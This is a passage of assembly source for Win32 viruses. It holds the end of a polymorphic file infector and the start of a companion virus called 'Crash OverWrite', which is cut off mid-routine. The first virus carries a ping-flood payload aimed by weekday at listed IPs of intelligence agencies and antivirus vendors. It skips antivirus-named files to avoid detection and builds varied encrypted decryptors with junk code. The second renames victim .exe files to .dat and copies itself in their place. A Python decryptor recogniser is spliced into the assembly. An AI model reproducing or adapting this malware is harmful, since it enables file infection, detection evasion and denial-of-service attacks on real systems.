    push 6                          ; we do this for 6 words
    pop ecx                         ; = 12 bytes
    xor edx, edx

CreateICMP_CRC:                     ; load one
    lodsw
    movzx eax, ax                   ; mov it to eax ( clean upper part of eax )
    add edx, eax                    ; add it to edx ( we just add them all )

    loop CreateICMP_CRC

    movzx eax, dx                   ; add the lower ( dx ) and the upper part of
    shr edx, 16d                    ; edx together in eax

    add eax, edx

    movzx edx, ax                   ; save ax in edx
    shr eax, 16d                    ; mov upper part of eax to ax ( clean upper part )
    add eax, edx                    ; add old ax to new ax ( add upper part to lower part )

    not eax                         ; eax = - 1 * ( eax + 1 )
                                    ; this is our checksum

    mov word ptr [ebp+ICMP_CRC], ax

    push 16d                        ; get it out, we send our packet !
    lea eax, [ebp+offset Info]
    push eax
    push 0
    push 12d
    lea eax, [ebp+offset ICMP_Packet]
    push eax
    push dword ptr [ebp+ICMP_Handle]
    call dword ptr [ebp+Xsendto]

CloseSocket:                        ; close the socket, to stay stable ;)
    push dword ptr [ebp+ICMP_Handle]
    call dword ptr [ebp+Xclosesocket]
    call dword ptr [ebp+XWSACleanup]

    jmp PingFlood                   ; heh that was fun, let's do it again ;)

Timeout     dd 100000d              ; 10000 ms Timeout ( we don't really care about it *g* )
Info:

    dw 2h
    dw 0h

Target_IP   db 0d, 0d, 0d, 0d
            dd 0h                   ; there we will fill in the target ip address ;)

ICMP_Packet db 8h
            db 0h

ICMP_CRC    dw 0h                   ; for the CRC Calculation of the ping
            dd 0h
            dd 0h
            dd 0h

ICMP_Handle dd 0h                   ; the handle of the open Socket

TargetTable:                        ; these are our targets
                                    ; please note again, that i don't want to damage one
                                    ; of these servers ! I choose them because I think that
                                    ; they will stand such an attack if anyone will ever release this
                                    ; into the wild !!!

    db 62d, 156d, 146d, 231d        ; Sunday = www.bundesnachrichtendienst.de
    db 195d, 154d, 220d, 34d        ; Monday = French Secret Service ( dgse.citeweb.net )
    db 216d, 122d, 8d, 245d         ; Tuesday = www.avp.com ( AV )
    db 216d, 41d, 20d, 75d          ; Wednesday = www.lockdown2000.com
    db 194d, 252d, 6d, 47d          ; Thursday = www.f-secure.com
    db 208d, 226d, 167d, 23d        ; Friday = www.norton.com
    db 205d, 178d, 21d, 3d          ; Saturday = www.zonelabs.com

; ***************************************************************************
; -------------------------[ Align-Procedure ]-------------------------------
; ***************************************************************************

; lets align the size..

; eax - size
; ecx - base

Align:
    push edx
    xor edx, edx
    push eax
    div ecx
    pop eax
    sub ecx, edx
    add eax, ecx
    pop edx                         ; eax - new size

    ret

; ***************************************************************************
; --------------------------[ FindFile Procedures ]--------------------------
; ***************************************************************************

FindFirstFileProc:
    lea eax, [ebp+WIN32_FIND_DATA]
    push eax
    push esi
    call dword ptr [ebp+XFindFirstFileA]
    mov dword ptr [ebp+FindHandle], eax

    ret

FindNextFileProc:
    lea edi, [ebp+WFD_szFileName]
    mov ecx, 276d                   ; we clear these fields !
    xor eax, eax
    rep stosb

    lea eax, [ebp+WIN32_FIND_DATA]
    push eax
    mov eax, dword ptr [ebp+FindHandle]
    push eax
    call dword ptr [ebp+XFindNextFileA]

    ret

CheckFileName:
    pushad
    lea esi, [ebp+WFD_szFileName]
    mov edi, esi
    mov ecx, 260d

ConvertLoop:                        ; Convert to upper case
    lodsb
    cmp al, 96d
    jb Convert
    cmp al, 123d
    ja Convert
    or al, al
    jz EndConvert
    sub al, 32d

Convert:
    stosb

    loop ConvertLoop

EndConvert:
    lea edi, [ebp+WFD_szFileName]
    lea esi, [ebp+FileNames]
    mov ecx, 3h

FileNameCheck:                      ; check for av-names
    push ecx                        ; i don't want to infect them
    mov ecx, 260d

CheckON:
    lodsb
    repnz scasb
    or ecx, ecx
    jnz AVFile

    pop ecx
    inc esi

    loop FileNameCheck

    jmp EndFileNameCheck

AVFile:
    mov al, byte ptr [esi]          ; check if the second char also matches
    cmp byte ptr [edi], al
    je GotAVFile

    dec esi
    jmp CheckON

GotAVFile:
    pop ecx                         ; clear stack
    popad
    stc                             ; set carry flag
    ret

EndFileNameCheck:
    popad
    clc
    ret

FileNames   db 'AV'                 ; we avoid these names
            db 'AN'                 ; so we will not infect an AV and
            db 'DR'                 ; alert the user

; ***************************************************************************
; ---------------------[ Checks for PE / MZ Signs ]--------------------------
; ***************************************************************************

; we check here for PE and MZ signs
; to identify the Executable we want to infect
; I do this a little bit different than usual *g*

CheckPESign:
    cmp dword ptr [edi], 'FP'       ; check if greater or equal to PF
    jae NoPESign

    cmp dword ptr [edi], 'DP'       ; check if lower or equal to PD
    jbe NoPESign

    clc                             ; all that's left is PE
    ret

NoPESign:
    stc                             ; set carry flag
    ret

CheckMZSign:

cmp word ptr [ esi ], '[M'jae NoPESign

cmp word ptr [ esi ], 'YM'jbe NoPESign

clcret

ret

;****************************************************************************
; ----------------[ Generate a pseudo-random Number ]------------------------
;****************************************************************************

GetRand:                                ; generate a pseudo-random NR.
                                        ; based on some initial registers
        push    ecx                     ; and the Windows uptime (GetTickCount)
        add     ecx, eax
        call    dword ptr [ebp+XGetTickCount]
        add     eax, ecx
        add     eax, ecx
        add     eax, edx
        add     eax, edi
        add     eax, ebp
        add     eax, dword ptr [ebp+PolyLen]
        add     eax, dword ptr [ebp+LoopLen]

        sub     eax, esi
        sub     eax, ebx

        pop     ecx
        add     eax, ecx

        add     al, byte ptr [ebp+Reg1]
        add     ah, byte ptr [ebp+Reg2]

        or      eax, eax
        jne     GetOutRand
        mov     eax, 87654321h
        inc     eax

GetOutRand:
        xor     edx, edx                ; clean edx (needed to be able to divide later)
        div     ecx                     ; quotient is in EAX,
                                        ; the random number 0 .. ECX-1 is in EDX
        ret

;****************************************************************************
; ----------------------[ Generate a Poly Decryptor ]------------------------
;****************************************************************************

genPoly:
        and     dword ptr [ebp+PolyLen], 0h

        push    10h
        pop     ecx
        call    GetRand                 ; get a random number to start
                                        ; and save it as the new key used for all files
        mov     byte ptr [ebp+PolyKey], al

        call    GetRegs

        lea     edi, [ebp+PDecrypt]     ; here starts the decryptor

        call    RandJunk
                                        ; we have 3 different ways to put
                                        ; the size in ecx and 3 different ways
                                        ; to get the starting offset in esi
        push    2h                      ; divide by 2
        pop     ecx
        call    GetRand                 ; get a random number to decide what we do

        ; first, we need these 2 values before we start the
        ; decryption loop!

        ; if edx = 1 we use the second one
        dec     edx                     ; choose the order
        jz      SecondOrder

FirstOrder:
        call    GenerateESI             ; esi comes first and ecx follows
        call    RandJunk
        call    GenerateECX             ; and 4 different ways to get the size in ecx
        jmp     Polypreparefinished     ; so there is nothing static here!

SecondOrder:                            ; ecx comes first and esi follows
        call    GenerateECX
        call    RandJunk
        call    GenerateESI

Polypreparefinished:                    ; we finished the preparing and can start the loop
                                        ; we need a
                                        ; xor byte ptr [esi], key (or other crypto)
                                        ; inc esi / add esi, 1h
                                        ; loop Decryptor / dec ecx, jnz Above ..

        ; length of loop = 0
        and     dword ptr [ebp+LoopLen], 0

        ; now we choose the way we crypt this thing!

        push    5h
        pop     ecx
        call    GetRand
        mov     dword ptr [ebp+CryptType], edx

XorDecrypt:                             ; we use a simple XOR BYTE PTR [ESI], KEY
        dec     edx
        jnz     NegDecrypt

        mov     ax, 3680h               ; xor byte ptr [esi]
        stosw

        mov     al, byte ptr [ebp+PolyKey]
        stosb

        ; increase sizes (we will add the last 2 bytes later)
        add     dword ptr [ebp+LoopLen], 1h
        add     dword ptr [ebp+PolyLen], 1h

        jmp     EndPolyCrypto

NegDecrypt:                             ; neg byte ptr [esi]
        dec     edx
        jnz     NotDecrypt
        mov     ax, 1EF6h
        stosw
        jmp     EndPolyCrypto

NotDecrypt:                             ; not byte ptr [esi]
        dec     edx
        jnz     IncDecrypt
        mov     ax, 16F6h
        stosw
        jmp     EndPolyCrypto

IncDecrypt:                             ; inc byte ptr [esi]
        dec     edx
        jnz     DecDecrypt
        mov     ax, 06FEh
        stosw
        jmp     EndPolyCrypto

DecDecrypt:                             ; dec byte ptr [esi]
        mov     ax, 0EFEh
        stosw

EndPolyCrypto:                          ; add the last 2 bytes
        add     dword ptr [ebp+LoopLen], 2h
        add     dword ptr [ebp+PolyLen], 2h

        call    RandJunk                ; more junk.. ;)

        ; now we need to increase esi
        ; to crypt the next byte

        push    3h
        pop     ecx
        call    GetRand

IncESI1:
        dec     edx
        jnz     IncESI2

        mov     al, 46h                 ; do a simple inc esi
        stosb

        jmp     EndIncESI

IncESI2:                                ; add esi, 1h
        dec     edx
        jnz     IncESI3

        mov     al, 83h
        stosb
        mov     ax, 01C6h
        stosw

        jmp     EndIncESI2

IncESI3:                                ; clc / adc esi, 1h
        mov     eax, 01d683f8h
        stosd

        add     dword ptr [ebp+LoopLen], 1h
        add     dword ptr [ebp+PolyLen], 1h

EndIncESI2:
        add     dword ptr [ebp+LoopLen], 2h
        add     dword ptr [ebp+PolyLen], 2h

EndIncESI:
        add     dword ptr [ebp+LoopLen], 1h
        add     dword ptr [ebp+PolyLen], 1h

        call    RandJunk                ; more, and more..

        ; now esi is incremented and we just have to do
        ; the loop

        push    3h
        pop     ecx
        call    GetRand

LoopType1:                              ; we use the most common form: loop ;)
        dec     edx
        jnz     LoopType2

        mov     al, 0e2h
        stosb

        call    StoreLoopLen

        jmp     EndLoopType

LoopType2:                              ; we do a dec ecx / jnz
        dec     edx
        jnz     LoopType3

        mov     ax, 7549h
        stosw
        add     dword ptr [ebp+LoopLen], 1h ; correct loop size (dec ecx = 1 byte)
        call    StoreLoopLen

        add     dword ptr [ebp+PolyLen], 1h

        jmp     EndLoopType

LoopType3:
        mov     eax, 0F98349h           ; dec ecx / cmp ecx, 0h
        stosd
        add     dword ptr [ebp+LoopLen], 4h
        mov     al, 75h                 ; jne
        stosb
        add     dword ptr [ebp+PolyLen], 3h
        call    StoreLoopLen

EndLoopType:
        add     dword ptr [ebp+PolyLen], 2h

        mov     byte ptr [edi], 0C3h    ; save the ending ret
        add     dword ptr [ebp+PolyLen], 2h

        mov     eax, VirusSize          ; calculate the new size for the virus
        add     eax, dword ptr [ebp+PolyLen]
        mov     dword ptr [ebp+VirLen], eax

        ret

StoreLoopLen:
        xor     eax, eax                ; calculate the displacement for the loop
        mov     ax, 100h
        sub     eax, dword ptr [ebp+LoopLen]
        sub     eax, 2h
        stosb

        ret

;****************************************************************************
; --------------------------[ Insert Junk Code ]-----------------------------
;****************************************************************************
RandJunk:                               ; edi points to the place where they will be stored

        ; we will insert 1-8 junk instructions
        push    7d                      ; each time this routine is called
        pop     ecx
        call    GetRand
        xchg    ecx, edx
        inc     ecx

        push    ecx

RandJunkLoop:
        push    ecx

        push    8h
        pop     ecx
        call    GetRand                 ; get a random number from 0 to 7
        xchg    eax, edx

        lea     ebx, [ebp+OpcodeTable]
        xlat                            ; get the chosen opcode
        stosb                           ; and save it to edi
        xor     eax, eax                ; clean eax

        ; get first register
        mov     al, byte ptr [ebp+Reg1]
        shl     eax, 3h                 ; multiply with 8
        add     eax, 0c0h               ; add base (ModRM mod = 11)

        ; add the second register
        add     al, byte ptr [ebp+Reg2]
        stosb                           ; save the ModRM byte

XchangeRegs:                            ; we get new ones and exchange them
        call    GetRegs                 ; cause the rnd generator relies on them *g*
        mov     al, byte ptr [ebp+Reg1]
        mov     ah, byte ptr [ebp+Reg2]
        mov     byte ptr [ebp+Reg1], ah
        mov     byte ptr [ebp+Reg2], al

        pop     ecx                     ; restore ecx
        loop    RandJunkLoop            ; and loop

        pop     ecx                     ; we need the additional length
        shl     ecx, 1                  ; multiply with 2

        ; save it
        add     dword ptr [ebp+LoopLen], ecx
        add     dword ptr [ebp+PolyLen], ecx

        ret

OpcodeTable:
        db      08Bh                    ; mov
        db      033h                    ; xor
        db      00Bh                    ; or
        db      02Bh                    ; sub
        db      003h                    ; add
        db      023h                    ; and
        db      013h                    ; adc
        db      01Bh                    ; sbb

GetRegs:                                ; select two registers to use
                                        ; set to Error
        pushad
        mov     byte ptr [ebp+Reg1], -1
        mov     byte ptr [ebp+Reg2], -1

        lea     edi, [ebp+Reg1]
        mov     ecx, 2

        ; now we choose 2 registers we use

NextReg:                                ; to make the junk code look realistic
        push    ecx
        push    8h
        pop     ecx
        call    GetRand
        pop     ecx

        cmp     edx, 1h                 ; we will not use ECX
        je      NextReg
        cmp     edx, 4h                 ; ESP
        je      NextReg
        cmp     edx, 6h                 ; or ESI, cause these values are important
        je      NextReg                 ; for the decryptor or the virus to work.
        mov     al, dl                  ; save it
        stosb
        loop    NextReg

        popad
        ret

;****************************************************************************
; -------------------------[ Get esi from stack ]----------------------------
;****************************************************************************

GenerateESI:
        ; the first thing we do is to get the
        ; start of the crypted code, this is simple,
        ; it is our return address, so we get it from
        ; the stack
        ; there are 3 different ways we can do this

        push    3h
        pop     ecx
        call    GetRand
        dec     edx                     ; which way do we use?

        jnz     ESI2

ESI1:
        lea     esi, [ebp+movESI]       ; use the mov esi, [esp] instruction
        movsw                           ; 3 bytes long
        movsb
        add     dword ptr [ebp+PolyLen], 3h

        jmp     EndESI                  ; get back

ESI2:                                   ; we simply pop esi and push it again
        dec     edx
        jnz     ESI3

        mov     al, 5eh                 ; pop esi
        stosb
        mov     al, 56h
        stosb                           ; push esi
        add     dword ptr [ebp+PolyLen], 2h
        jmp     EndESI

ESI3:
        push    5h
        pop     ecx
        call    GetRand
        xchg    eax, edx
        cmp     al, 1h                  ; if we got ecx, we use eax
        jne     ESI3b
        xor     eax, eax

ESI3b:
        mov     edx, eax
        push    edx                     ; save edx
        add     eax, 58h                ; pop a register
        stosb

        pop     eax                     ; push the value again
        push    eax
        add     eax, 50h
        stosb

        mov     al, 08bh                ; and finally move it to esi
        stosb
        pop     eax
        mov     al, 0f0h
        add     al, dl
        stosb
        add     dword ptr [ebp+PolyLen], 4h

EndESI:
        ret

; code to retrieve the start of crypt-code
movESI  db      8bh, 34h, 24h           ; mov esi, [esp]

;****************************************************************************
; --------------------------[ Move the size to ECX ]-------------------------
;****************************************************************************

GenerateECX:                            ; here we put the size of the crypted
                                        ; part in ecx
        push    3h
        pop     ecx
        call    GetRand                 ; random Nr in edx
        inc     edx                     ; increase

ECX1:                                   ; use a simple mov
        dec     edx
        jnz     ECX2

        mov     al, 0b9h                ; mov
        call    StoreALValue

        jmp     EndECX

ECX2:                                   ; let's use a push (value)
        dec     edx                     ; pop ecx
        jnz     ECX3

        mov     al, 068h                ; push
        call    StoreALValue

        mov     al, 59h                 ; save the pop ecx
        stosb
        add     dword ptr [ebp+PolyLen], 1h

        jmp     EndECX

ECX3:
        push    -1
        pop     ecx
        call    GetRand
        mov     eax, VirusSize
        shl     edx, 26d
        shr     edx, 26d
        sub     eax, edx

        push    eax                     ; mov ecx, Size - X
        mov     al, 0b9h
        stosb                           ; and the size we need to decrypt
        pop     eax
        stosb
        call    StoShrEAX

        mov     ax, 0c181h              ; add ecx, X
        stosw
        xor     eax, eax
        mov     al, dl

        stosb
        call    StoShrEAX
        add     dword ptr [ebp+PolyLen], 11d

        jmp     EndECX                  ; finish

StoreECX:                               ; save the mov
        push    ax                      ; save the register

        mov     al, 0b8h                ; save the mov reg, size
        add     al, dl
        call    StoreALValue

        mov     al, 03h                 ; add ecx, reg
        stosb
        pop     ax                      ; get the chosen register
        add     al, 0c8h
        stosb

        add     dword ptr [ebp+PolyLen], 4h

EndECX:                                 ; let's return
        ret

StoShrEAX:                              ; to save dwords backwards
        push    3
        pop     ecx

StoShrEAXLoop:
        shr     eax, 8
        stosb
        loop    StoShrEAXLoop

        ret

StoreALValue:                           ; we store the instruction in al
        stosb                           ; and the size we need to decrypt
        mov     eax, FirstLSize         ; eax = size
        stosb
        call    StoShrEAX

        add     dword ptr [ebp+PolyLen], 5h
        add     dword ptr [ebp+LoopLen], 5h

        ret
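Every decryptor that genPoly emits follows one grammar: junk instructions built from OpcodeTable (a 2-byte register-to-register ALU op), the ESI and ECX set-ups in either order, one of the five crypt instructions, one of the three ESI increments, one of the three loop forms, and a final ret, with the loop displacement always pointing back at the crypt instruction. The Python below is an added example written for this page, not code from the virus or its author: a recogniser that walks that grammar, checks the displacement, recovers the operation, key and length, and applies the recovered operation to a buffer the way the stub would. The sample stub is constructed by hand from the byte values listed in the source; that the encrypted bytes directly follow the stub's ret is a layout choice for the example, not something the page states. The unreachable StoreECX form is not recognised.

```python
"""Recogniser for decryptor stubs in the grammar genPoly above produces.

Added example for this page (not the virus author's code). Byte values come
from the source listing: OpcodeTable, the crypt opcodes (3680h, 1EF6h, 16F6h,
06FEh, 0EFEh), the ESI increments (46h, 83 C6 01, F8 83 D6 01) and the three
loop forms (E2, 49 75, 49 83 F9 00 75), each followed by a rel8 displacement.
"""
from dataclasses import dataclass
from typing import Optional

JUNK_OPCODES = {0x8B, 0x33, 0x0B, 0x2B, 0x03, 0x23, 0x13, 0x1B}   # OpcodeTable

# crypt instruction -> (name, carries an immediate key byte)
CRYPT_OPS = {
    b"\x80\x36": ("xor", True),    # xor byte ptr [esi], key
    b"\xf6\x1e": ("neg", False),   # neg byte ptr [esi]
    b"\xf6\x16": ("not", False),   # not byte ptr [esi]
    b"\xfe\x06": ("inc", False),   # inc byte ptr [esi]
    b"\xfe\x0e": ("dec", False),   # dec byte ptr [esi]
}
ESI_INCS = (b"\x46", b"\x83\xc6\x01", b"\xf8\x83\xd6\x01")
LOOPS = (b"\xe2", b"\x49\x75", b"\x49\x83\xf9\x00\x75")


@dataclass
class Decryptor:
    op: str
    key: Optional[int]      # only meaningful for "xor"
    count: int              # bytes the loop processes (the value placed in ECX)
    loop_start: int         # offset of the crypt instruction inside the stub
    length: int             # stub length up to and including the final ret


def _skip_junk(buf: bytes, i: int) -> int:
    """RandJunk emits opcode + ModRM with mod=11 (register, register)."""
    while i + 1 < len(buf) and buf[i] in JUNK_OPCODES and buf[i + 1] >= 0xC0:
        i += 2
    return i


def _parse_esi(buf: bytes, i: int) -> Optional[int]:
    """GenerateESI: mov esi,[esp] | pop esi/push esi | pop r/push r/mov esi,r."""
    if buf.startswith(b"\x8b\x34\x24", i):
        return i + 3
    if buf.startswith(b"\x5e\x56", i):
        return i + 2
    if (i + 3 < len(buf) and 0x58 <= buf[i] <= 0x5F
            and buf[i + 1] == buf[i] - 8           # push of the same register
            and buf[i + 2] == 0x8B and buf[i + 3] == 0xF0 + (buf[i] - 0x58)):
        return i + 4
    return None


def _parse_ecx(buf: bytes, i: int) -> Optional[tuple]:
    """GenerateECX: mov ecx,imm | push imm/pop ecx | mov ecx,imm + add ecx,imm."""
    if i >= len(buf):
        return None
    if buf[i] == 0xB9 and i + 5 <= len(buf):
        value, j = int.from_bytes(buf[i + 1:i + 5], "little"), i + 5
        if buf.startswith(b"\x81\xc1", j) and j + 6 <= len(buf):
            value = (value + int.from_bytes(buf[j + 2:j + 6], "little")) & 0xFFFFFFFF
            j += 6
        return j, value
    if buf[i] == 0x68 and i + 6 <= len(buf) and buf[i + 5] == 0x59:
        return i + 6, int.from_bytes(buf[i + 1:i + 5], "little")
    return None


def parse_decryptor(buf: bytes) -> Optional[Decryptor]:
    """Return the stub's parameters, or None if buf does not fit the grammar."""
    i = _skip_junk(buf, 0)
    got_esi, count = False, None
    for _ in range(2):                      # ESI and ECX set-up, either order
        nxt = _parse_esi(buf, i)
        if nxt is not None and not got_esi:
            i, got_esi = nxt, True
        else:
            ecx = _parse_ecx(buf, i)
            if ecx is None or count is not None:
                return None
            i, count = ecx
        i = _skip_junk(buf, i)
    if not got_esi or count is None:
        return None
    loop_start = i
    op = key = None
    for pat, (name, has_key) in CRYPT_OPS.items():
        if buf.startswith(pat, i):
            op, i = name, i + len(pat)
            if has_key:
                if i >= len(buf):
                    return None
                key, i = buf[i], i + 1
            break
    if op is None:
        return None
    i = _skip_junk(buf, i)
    for pat in ESI_INCS:
        if buf.startswith(pat, i):
            i += len(pat)
            break
    else:
        return None
    i = _skip_junk(buf, i)
    for pat in LOOPS:
        if buf.startswith(pat, i):
            i += len(pat)
            break
    else:
        return None
    if i + 1 >= len(buf):
        return None
    rel8 = buf[i] - 0x100 if buf[i] >= 0x80 else buf[i]
    if i + 1 + rel8 != loop_start or buf[i + 1] != 0xC3:   # must jump back to the crypt op
        return None
    return Decryptor(op, key, count, loop_start, i + 2)


def run_decryptor(dec: Decryptor, body: bytes) -> bytes:
    """Apply the recovered instruction to the first dec.count bytes, as the stub would."""
    out = bytearray(body[:dec.count])
    for k, b in enumerate(out):
        if dec.op == "xor":
            b ^= dec.key
        elif dec.op == "neg":
            b = -b
        elif dec.op == "not":
            b = ~b
        elif dec.op == "inc":
            b += 1
        else:                               # "dec"
            b -= 1
        out[k] = b & 0xFF
    return bytes(out)


def sample_stub() -> bytes:
    """Constructed stub (not a captured sample): ESI set-up first, push/pop ECX,
    xor with key 5Ah, add esi,1 and the dec ecx / jnz loop form."""
    return bytes([
        0x8B, 0xC3,                             # junk: mov eax, ebx
        0x5E, 0x56,                             # pop esi / push esi
        0x33, 0xDA,                             # junk: xor ebx, edx
        0x68, 0x03, 0x00, 0x00, 0x00, 0x59,     # push 3 / pop ecx
        0x03, 0xEF,                             # junk: add ebp, edi
        0x80, 0x36, 0x5A,                       # xor byte ptr [esi], 5Ah  (offset 14)
        0x2B, 0xC2,                             # junk: sub eax, edx
        0x83, 0xC6, 0x01,                       # add esi, 1
        0x0B, 0xD8,                             # junk: or ebx, eax
        0x49, 0x75, 0xF3,                       # dec ecx / jnz -13 (back to offset 14)
        0xC3,                                   # ret
    ])


if __name__ == "__main__":
    dec = parse_decryptor(sample_stub())
    print(dec)
    print(run_decryptor(dec, bytes([0x3B, 0x38, 0x39])))
```

Because the key is a single byte and the five operations are fixed, recovering the body needs no brute force at all once the stub is recognised; the structural check on the rel8 displacement is what separates a genuine stub from random bytes that happen to start with a junk opcode.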

;****************************************************************************
; -------------------[ Data which does not travel ]--------------------------
;****************************************************************************
VirusEnd:                               ; ok, this data will travel, but will be generated
                                        ; new on each run

PDecrypt:                               ; here will we add the polymorphic
                                        ; decryption routine later, but not included
                                        ; into the 1st generation
        ret                             ; so we just return

        db      150d dup (0h)           ; we keep 150 bytes free, so we have a buffer
                                        ; for the poly decryptor

; here we save the data which does not
; travel with each copy of the virus

PolyKey         db (?)                  ; key for the poly decryptor
PolyLen         dd (?)                  ; length of decryptor
VirLen          dd (?)                  ; virus length + decryptor
LoopLen         dd (?)                  ; length of the decryption loop
CryptType       dd (?)                  ; we save which kind of encryption we use

Reg1            db (?)                  ; here we save the registers we use for the junk
Reg2            db (?)                  ; code

SEH_Save        dd (?)                  ; We save the original SEH

; Handles of the dll's we use
K32Handle       dd (?)                  ; Kernel32.dll might be necessary *g*
IHLHandle       dd (?)                  ; Imagehlp.dll to create checksums
ADVHandle       dd (?)                  ; Advapi32.dll for registry access
W32Handle       dd (?)                  ; Wsock32.dll for pinging

; The Offsets of the API's we use
XLoadLibraryA   dd (?)                  ; Here we save their Offset
XGetProcAddress dd (?)
XFindFirstFileA dd (?)
XFindNextFileA  dd (?)
XFindClose      dd (?)
XCreateFileA    dd (?)
XSetFileAttributesA dd (?)
XCloseHandle    dd (?)
XCreateFileMappingA dd (?)
XMapViewOfFile  dd (?)
XUnmapViewOfFile dd (?)
XGetWindowsDirectoryA dd (?)
XGetSystemDirectoryA dd (?)
XGetCurrentDirectoryA dd (?)
XSetCurrentDirectoryA dd (?)
XGetFileAttributesA dd (?)
XGetTickCount   dd (?)
XCreateThread   dd (?)
XGetSystemTime  dd (?)

XCheckSumMappedFile dd (?)

XRegOpenKeyExA  dd (?)
XRegQueryValueExA dd (?)
XRegCloseKey    dd (?)

Xsocket         dd (?)
XWSACleanup     dd (?)
XWSAStartup     dd (?)
Xclosesocket    dd (?)
Xsendto         dd (?)
Xsetsockopt     dd (?)

; Data to search Kernel
KernelAddy      dd (?)                  ; Pointer to kernel PE-Header
MZAddy          dd (?)                  ; Pointer to kernel MZ-Header

RegHandle       dd (?)                  ; Handle to open Reg-Key

; Directories
windir          db 7Fh dup (0)          ; here we save the directories
curdir          db 7Fh dup (0)          ; we want to infect

; some data for infection
counter         dw (?)                  ; a counter to know how many names we have compared
ATableVA        dd (?)                  ; the Address Table VA
NTableVA        dd (?)                  ; the Name Pointer Table VA
OTableVA        dd (?)                  ; the Ordinal Table VA

NewSize         dd (?)                  ; we save the new size of the file here
CheckSum        dd (?)                  ; checksum
HeaderSum       dd (?)                  ; crc of header

; Data to find files

WIN32_FIND_DATA label byte
WFD_dwFileAttributes    dd ?
WFD_ftCreationTime      FILETIME ?
WFD_ftLastAccessTime    FILETIME ?
WFD_ftLastWriteTime     FILETIME ?
WFD_nFileSizeHigh       dd ?
WFD_nFileSizeLow        dd ?
WFD_dwReserved0         dd ?
WFD_dwReserved1         dd ?
WFD_szFileName          db 260d dup (?)
WFD_szAlternateFileName db 13 dup (?)
WFD_szAlternateEnding   db 03 dup (?)

FileHandle      dd (?)                  ; handle of file
MapHandle       dd (?)                  ; Handle of Map
MapAddress      dd (?)                  ; offset of Map

Attributes      dd (?)                  ; saved File-Attributes
threadID        dd (?)                  ; payload runs in an extra thread

; we need this buffer for following
; the shortcuts

Buffer          db 337d dup (?)

; this buffer is necessary
; to create a winsock connection (ping)

WSA_DATA        db 400d dup (0)

SystemTime:                             ; needed to get the current day
wYear           dw (?)
wMonth          dw (?)
wDayOfWeek      dw (?)                  ; Sunday = 0, Monday = 1 .. etc.
wDay            dw (?)
wHour           dw (?)
wMinute         dw (?)
wSecond         dw (?)
wMilliseconds   dw (?)

EndBufferData:
;****************************************************************************
; ------------------------[ That's all folks ]-------------------------------
;****************************************************************************
end Virus


; comment *
;
; Name:  Crash OverWrite :-)
; Coder: BeLiAL
;
; This is my first win32 virus. It's only a
; companion virus but it does its work very
; well. It's perhaps coded a bit lame but
; I'm sure nobody will care. It infects the
; first file in the directory and renames
; the victim file to .dat. Perhaps I'll
; make it resident or infect more files...
; Greetings and thanx go out
; to Evul, Toro, Padisah and Wallo.
;
; BeLiAL
;*

.386

.model flat
Locals
Jumps

Extrn FindFirstFileA : PROC
Extrn FindNextFileA : PROC
Extrn CreateFileA : PROC
Extrn WriteFile : PROC
Extrn ReadFile : PROC
Extrn GlobalAlloc : PROC
Extrn GlobalFree : PROC
Extrn ExitProcess : PROC
Extrn WinExec : PROC
Extrn CopyFileA : PROC
Extrn CloseHandle : PROC
Extrn SetFilePointer : PROC
Extrn GetFileSize : PROC

.data

MAX_PATH        EQU 0ffh
FALSE           EQU 0
changeoffset    EQU 094fh
winsize         EQU 05h

FILETIME struct
  dwLowDateTime   DWORD ?
  dwHighDateTime  DWORD ?
FILETIME ends

WIN32_FIND_DATA struct
  dwFileAttributes  DWORD ?
  ftCreationTime    FILETIME <>
  ftLastAccessTime  FILETIME <>
  ftLastWriteTime   FILETIME <>
  nFileSizeHigh     DWORD ?
  nFileSizeLow      DWORD ?
  dwReserved0       DWORD ?
  dwReserved1       DWORD ?
  cFileName         BYTE MAX_PATH dup (?)
  cAlternate        BYTE 0eh dup (?)
ends
FindFileData    WIN32_FIND_DATA <>

memptr          dd 0
counter1        dd 0
filehandle      dd 0
filesize        dd 00001000h
exefile         db '*.exe', 0
myname          db 'crashoverwrite.exe', 0
                dd 0
                dd 0

secbuffer       dd 0
                dd 0
                dd 0
                dd 0
                db '[Crash OverWrite] coded by BeLiAL'

.code

start:
        push    offset FindFileData
        push    offset exefile
        call    FindFirstFileA

already_infected:
        mov     eax, dword ptr nFileSizeLow.FindFileData
        cmp     eax, 00001000h
        je      reanimate
        mov     eax, offset cFileName.FindFileData

find_dot1:
        cmp     byte ptr ds:[eax], '.'
        je      next_step1
        add     eax, 1
        jmp     find_dot1

next_step1:
        add     eax, 1
        push    eax
        mov     byte ptr ds:[eax], 'd'
        add     eax, 1
        mov     byte ptr ds:[eax], 'a'
        add     eax, 1
        mov     byte ptr ds:[eax], 't'
        mov     ebx, offset cFileName.FindFileData
        mov     eax, offset secbuffer

find_dot2:
        mov     dh, byte ptr ds:[ebx]
        cmp     edx, 0
        je      next_step2
        mov     byte ptr ds:[eax], dh
        add     ebx, 1
        add     eax, 1
        jmp     find_dot2

next_step2:
        pop     eax
        push    FALSE
        push    offset secbuffer
        mov     byte ptr ds:[eax], 'e'
        add     eax, 1
        mov     byte ptr ds:[eax], 'x'
        add     eax, 1
        mov     byte ptr ds:[eax], 'e'
        push    offset cFileName.FindFileData
        call    CopyFileA
        push    FALSE
        push    offset cFileName.FindFileData
        push    offset myname
        call    CopyFileA

open_victim:
        push    0
        push    080h
        push    3h
        push    0h
        push    0h
        push    0c0000000h
        push    offset FindFileData.cFileName
        call    CreateFileA
        mov     filehandle, eax
        cmp     eax, 0ffffffffh
        je      reanimate

getmemory:
        push    filesize
        push    0
        call    GlobalAlloc             ; get the memory
        mov     edx, eax
        cmp     eax, 0
        je      close_file
        push    edx

copyinmemory:
        push    0
        push    offset counter1
        push    filesize
        push    edx
        push    filehandle
        call    ReadFile
        pop     edx
        mov     dword ptr memptr, edx   ; for later use
        add     edx, changeoffset
        mov     eax, offset cFileName.FindFileData

modify_victim:
        mov     bh, byte ptr ds:[eax]
        mov     byte ptr ds:[edx], bh
        cmp     bh, 0
        je      set_pointer
        add     eax, 1
        add     edx, 1
        jmp     modify_victim

set_pointer:
        push    0
        push    0
        push    0
        push    filehandle
        call    SetFilePointer

copy_to_file:
        push    0
        push    offset counter1
        push    filesize
        push    memptr
        push    filehandle
        call    WriteFile

close_file:
        push    filehandle
        call    CloseHandle

reanimate:
        mov     eax, offset myname

find_dot3:
        mov     bx, word ptr ds:[eax]
        cmp     bx, 'e.'
        je      next_step3
        cmp     bx, 'E.'
        je      next_step3
        add     eax, 1
        jmp     find_dot3

next_step3:
        add     eax, 1
        mov     byte ptr ds:[eax], 'd'
        add     eax, 1
        mov     byte ptr ds:[eax], 'a'
